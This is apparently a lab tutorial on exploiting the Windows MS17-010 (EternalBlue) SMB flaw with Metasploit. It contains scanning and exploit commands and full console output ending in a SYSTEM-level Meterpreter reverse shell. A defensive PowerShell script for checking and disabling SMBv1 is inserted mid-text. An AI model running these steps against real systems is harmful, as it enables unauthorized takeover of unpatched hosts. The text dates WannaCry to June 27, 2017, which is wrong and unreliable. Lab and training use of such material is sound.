Exploiting Windows MS17-010 SMB Vulnerability
MS17-010 EternalBlue Exploit
EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability and was leaked to the public by a hacker group called the Shadow Brokers in 2017.
The EternalBlue exploit takes advantage of a vulnerability in the Windows SMBv1 protocol that allows attackers to send specially crafted packets that consequently facilitate the execution of arbitrary commands.
The EternalBlue exploit was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
This vulnerability affects multiple versions of Windows:
- Windows Vista
- Windows 7
- Windows Server 2008
- Windows 8.1
- Windows Server 2012
- Windows 10
- Windows Server 2016
Microsoft released a patch for the vulnerability in March 2017; however, many users and companies still have not patched their systems.
Metasploit (MSF) provides an auxiliary module that checks whether a target system is vulnerable to the exploit, and an exploit module that exploits the vulnerability on unpatched systems.
The EternalBlue exploit module can be used against vulnerable Windows systems and, on success, provides a privileged Meterpreter session on the target.
Demo: Exploiting Windows MS17-010 SMB Vulnerability
SMB is used for network file sharing.
The key thing to note here is that this particular vulnerability, and consequently the EternalBlue exploit, provides us with a privileged session. So instead of a standard, non-privileged Meterpreter session, we get full NT AUTHORITY\SYSTEM permissions in our Meterpreter session, which means we have total control over that target system and, consequently, a foothold against other Windows systems on the network.
```
msfconsole
```
Perform a port scan on the target system to identify whether SMB is running and on which port.
Create a workspace.
```
workspace -a EternalBlue
```
Perform an Nmap scan and import the results directly into the MSF database, and more specifically into our current workspace. The options used:
- `-sS`: Perform a SYN scan.
- `-sV`: Perform a service version detection scan.
- `-O`: Perform an operating system detection scan.
```
db_nmap -sS -sV -O 10.10.10.7
```
List out the services.
```
services
```
Perform a check using the EternalBlue auxiliary module. This module scans the target and reports whether it is vulnerable to the EternalBlue exploit.
You can also scan an entire subnet. If you are performing a penetration test on a whole network, I would recommend running this module as part of your vulnerability scanning to check whether any of the Windows systems on the network are vulnerable to this particular exploit.
```
search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.10.7
run
```
Search for the EternalBlue exploit module.
```
search type:exploit EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.7
run
```
```
meterpreter > sysinfo
```
Check our privileges with the getuid (get user ID) command.
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
We currently have access to the target system as NT AUTHORITY\SYSTEM, which means we have the highest privileges possible on the Windows system and therefore total control over it: we can execute any command.
In this particular case, once we have utilized this particular exploit, we do not need to perform any privilege escalation as we’ve already obtained an elevated Meterpreter session.
Home Lab
Kali: 192.168.248.148
Windows 2008 R2: 192.168.248.133
How to detect status, enable, and disable SMB protocols
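The Microsoft article named above describes checking and disabling SMBv1 by hand. The PowerShell script below is an added example (it is not part of the original post, nor Metasploit code) that performs the checks a defender wants on a Windows host after a demo like this one: whether the SMBv1 server is still enabled, whether an MS17-010 update is installed, and, with -Remediate, disabling SMBv1. Assumptions: the default KB ids KB4012212 (security-only) and KB4012215 (monthly rollup) are the MS17-010 updates for Windows 7 SP1 and Server 2008 R2 SP1; other Windows versions use different ids, which you pass with -KbIds. Note that the lab target above reports build 7600, i.e. Server 2008 R2 without SP1, and MS17-010 was only released for SP1, so such a host can only be fixed by installing SP1 plus the update, or by disabling SMBv1 entirely.

```powershell
# Added example, not from the original post: MS17-010 posture check for one
# Windows host. Run from an elevated PowerShell prompt.
# Assumption: the default KB ids are the MS17-010 updates for Windows 7 SP1 /
# Server 2008 R2 SP1 only; other builds need their own ids from the bulletin.
param(
    [string[]]$KbIds = @('KB4012212', 'KB4012215'),
    [switch]$Remediate
)

$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1Enabled {
    # Windows 8 / Server 2012 and later expose the setting through the SmbShare
    # module; Windows 7 / Server 2008 R2 only have the registry value, which
    # means "SMBv1 enabled" when it is absent.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return [bool](Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    $params = Get-ItemProperty -Path $LanmanParams -ErrorAction SilentlyContinue
    if ($null -eq $params -or $null -eq $params.SMB1) { return $true }
    return ($params.SMB1 -ne 0)
}

function Test-Ms17010Installed {
    param([string[]]$Ids)
    # Get-HotFix lists installed updates by KB id on every supported build.
    $hits = Get-HotFix -ErrorAction SilentlyContinue | Where-Object { $Ids -contains $_.HotFixID }
    return [bool]$hits
}

function Disable-Smb1Server {
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        # Registry switch for Windows 7 / Server 2008 R2; takes effect after a reboot.
        Set-ItemProperty -Path $LanmanParams -Name SMB1 -Type DWORD -Value 0 -Force
    }
}

# Get-WmiObject rather than Get-CimInstance so the script also runs on the
# PowerShell 2.0 that ships with Server 2008 R2.
$os      = Get-WmiObject Win32_OperatingSystem
$smb1    = Get-Smb1Enabled
$patched = Test-Ms17010Installed -Ids $KbIds

Write-Host ("Host: {0}  OS: {1} (build {2}, SP{3})" -f $env:COMPUTERNAME, $os.Caption, $os.BuildNumber, $os.ServicePackMajorVersion)
Write-Host ("SMBv1 server enabled : {0}" -f $smb1)
Write-Host ("MS17-010 KB present  : {0}  (checked: {1})" -f $patched, ($KbIds -join ', '))

if ($smb1 -and -not $patched) {
    Write-Warning 'Exposed to MS17-010 on TCP 445: no MS17-010 update found and SMBv1 is enabled.'
}
if ($Remediate -and $smb1) {
    Disable-Smb1Server
    Write-Host 'SMBv1 server disabled; a reboot is required on Windows 7 / Server 2008 R2.'
}
```

Run it without arguments first to get the report, then with -Remediate once file-sharing clients that still depend on SMBv1 have been ruled out. Disabling SMBv1 removes the protocol the exploit needs regardless of patch level, which is why it is the fallback for hosts, like the RTM build in this lab, that no longer receive updates.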
```
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 auxiliary(scanner/smb/smb_ms17_010) > db_nmap -sS -sV -O 192.168.248.133
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-27 08:16 EST
[*] Nmap: Nmap scan report for 192.168.248.133
[*] Nmap: Host is up (0.00030s latency).
[*] Nmap: Not shown: 989 closed tcp ports (reset)
[*] Nmap: PORT      STATE SERVICE            VERSION
[*] Nmap: 135/tcp   open  msrpc              Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp  open  ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49156/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49157/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49158/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: MAC Address: 00:0C:29:F7:9E:3F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows 7|2008|8.1
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
[*] Nmap: OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 78.36 seconds
```
```
msf6 auxiliary(scanner/smb/smb_ms17_010) > services
Services
========

host             port   proto  name               state  info
----             ----   -----  ----               -----  ----
192.168.248.133  135    tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
192.168.248.133  445    tcp    microsoft-ds       open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
192.168.248.133  3389   tcp    ssl/ms-wbt-server  open
192.168.248.133  49152  tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  49153  tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  49154  tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  49155  tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  49156  tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  49157  tcp    msrpc              open   Microsoft Windows RPC
192.168.248.133  49158  tcp    msrpc              open   Microsoft Windows RPC
```
```
msf6 > search type:auxiliary EternalBlue

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                     normal  No     MS17-010 SMB RCE Detection

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/smb/smb_ms17_010
```
```
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.
```
```
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.248.133
RHOSTS => 192.168.248.133
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.248.133:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
msf6 auxiliary(scanner/smb/smb_ms17_010) > search type:exploit EternalBlue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
```
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.248.150  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.248.148  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.
```
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.248.133
RHOSTS => 192.168.248.133
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.133:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.248.133:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.133:445 - The target is vulnerable.
[*] 192.168.248.133:445 - Connecting to target for exploitation.
[+] 192.168.248.133:445 - Connection established for exploitation.
[+] 192.168.248.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.133:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.133:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.133:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.133:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.248.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.133:445 - Starting non-paged pool grooming
[+] 192.168.248.133:445 - Sending SMBv2 buffers
[+] 192.168.248.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.133:445 - Sending final SMBv2 buffers.
[*] 192.168.248.133:445 - Sending last fragment of exploit packet!
[*] 192.168.248.133:445 - Receiving response from exploit packet
[+] 192.168.248.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.133:445 - Sending egg to corrupted connection.
[*] 192.168.248.133:445 - Triggering free of corrupted buffer.
[-] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.248.133:445 - Connecting to target for exploitation.
[+] 192.168.248.133:445 - Connection established for exploitation.
[+] 192.168.248.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.133:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.133:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.133:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.133:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.248.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.133:445 - Starting non-paged pool grooming
[+] 192.168.248.133:445 - Sending SMBv2 buffers
[+] 192.168.248.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.133:445 - Sending final SMBv2 buffers.
[*] 192.168.248.133:445 - Sending last fragment of exploit packet!
[*] 192.168.248.133:445 - Receiving response from exploit packet
[+] 192.168.248.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.133:445 - Sending egg to corrupted connection.
[*] 192.168.248.133:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.248.133
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.133:49165) at 2023-01-27 08:32:29 -0500
```
```
meterpreter > sysinfo
Computer        : WIN-4QCPUB6FIVL
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```